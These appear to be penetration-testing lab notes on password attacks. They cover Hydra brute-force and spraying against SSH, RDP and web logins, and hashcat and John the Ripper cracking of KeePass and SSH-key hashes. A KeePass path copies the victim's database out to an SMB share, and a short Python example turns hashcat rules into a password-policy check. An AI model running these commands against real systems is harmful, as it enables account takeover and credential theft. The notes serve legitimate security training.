Password Attacks


# Password and hash attacks with common tools

SSH and RDP dictionary attacks with Hydra

## SSH Bruteforce
kali@kali:/usr/share/wordlists$ sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.139.201
# -l known username (single)
# -P password list to try
# -s non-default port (2222)

## Password Spraying against RDP
kali@kali:~$ sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.139.202
# -L list of usernames, -p a single known password (one password, many users)

## POST login form dictionary attack

kali@kali:~$ sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.122.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
#
# fields of the http-post-form argument, separated by colons:
# 1 -> /index.php, the login page
# 2 -> body of the POST request (^PASS^ is replaced by each candidate password)
# 3 -> string that identifies a failed login

Hashcat

# benchmark the hash rate of this machine for each mode
hashcat -b

## Windows encrypted password manager (KeePass) attack path

# locate the KeePass database file
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

# copy it to an SMB share
copy .\Documents\Database.kdbx \\192.168.122.139\share\Database.kdbx

# convert the database to a crackable hash with the JohnTheRipper keepass helper
keepass2john database.kdbx > password.hash
# remove the leading "database:" string from the hash: hashcat expects no username field, and KeePass has none

# find the hashcat mode number for KeePass
hashcat --help | grep -i "KeePass"

# crack the hash
hashcat -m [mode] password.hash /usr/share/wordlists/rockyou.txt -r rulefile --force
# [mode] -> the number from the help output above
# rulefile -> /usr/share/hashcat/rules/rockyou-30000.rule



## Mutating wordlists (rule-based attack)

kali@kali:~/passwordattacks$ echo \$1 > demo.rule
kali@kali:~/passwordattacks$ hashcat -r demo.rule --stdout demo.txt

# $1 in the rule appends 1 to the end of every password
# $ appends, ^ prepends

kali@kali:~/passwordattacks$ echo c >> demo.rule
# c capitalises the first letter of every password

kali@kali:~/passwordattacks$ echo \$! >> demo.rule
# $! appends an !

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r demo.rule --force
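Added here as an example (not part of these notes): a small Python interpreter for the rule functions used above ($X append, ^X prepend, c capitalise, plus l and u), turned into a defensive check that flags any password a rule-based run over a given wordlist would generate. The wordlist is constructed; the rule list is the three-line demo.rule built above.

```python
# Added example, not from the notes: a minimal interpreter for a few hashcat
# rule functions, used as a password-policy check. A candidate is rejected when
# some wordlist entry mutated by some rule line equals it, because a rule-based
# run with that rule file would guess it. Wordlist and rule list are constructed.

def apply_rule(word, rule):
    """Apply one hashcat rule line (a sequence of functions) to a word."""
    i = 0
    while i < len(rule):
        fn = rule[i]
        if fn in (":", " "):          # ':' is the no-op rule; spaces separate functions
            i += 1
        elif fn == "$":               # $X appends character X
            word += rule[i + 1]
            i += 2
        elif fn == "^":               # ^X prepends character X
            word = rule[i + 1] + word
            i += 2
        elif fn == "c":               # capitalise first letter, lowercase the rest
            word = word[:1].upper() + word[1:].lower()
            i += 1
        elif fn == "l":               # lowercase everything
            word = word.lower()
            i += 1
        elif fn == "u":               # uppercase everything
            word = word.upper()
            i += 1
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return word


def candidates(word, rules):
    """Every candidate hashcat would emit for one word with this rule file."""
    return {apply_rule(word, r) for r in rules if r.strip() and not r.startswith("#")}


def reachable_by_rules(candidate, wordlist, rules):
    """True if a rule-based run over wordlist would produce candidate."""
    return any(candidate in candidates(w, rules) for w in wordlist)


# Constructed sample wordlist and the three-line demo.rule built in the notes.
WORDLIST = ["password", "summer", "welcome"]
DEMO_RULES = ["$1", "c", "$!"]

if __name__ == "__main__":
    for pw in ["welcome!", "Summer", "Summer1!"]:
        print(pw, "rejected" if reachable_by_rules(pw, WORDLIST, DEMO_RULES) else "accepted")
```

Each line of demo.rule is a separate rule, so "Summer1!" is not produced by the three-line file; it is only reached when the functions are combined on one line (c$1$!).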


## Cracking an SSH private key passphrase

ssh2john id_rsa > ssh.hash
# remove the filename prefix (everything before the first colon) from the hash
# the $x$ tag at the start of the hash identifies the format; match it to the hashcat mode

hashcat --help | grep -i "ssh"
# the mode number is in the output

JohnTheRipper

To use rule files:

# add [List.Rules:sshRules] at the beginning of the rule file
# append the rule file to /etc/john/john.conf

john --wordlist=ssh.passwords --rules=sshRules ssh.hash

## Group Policy Passwords

# decrypts the cpassword value stored in a Group Policy Preferences XML file
gpp-decrypt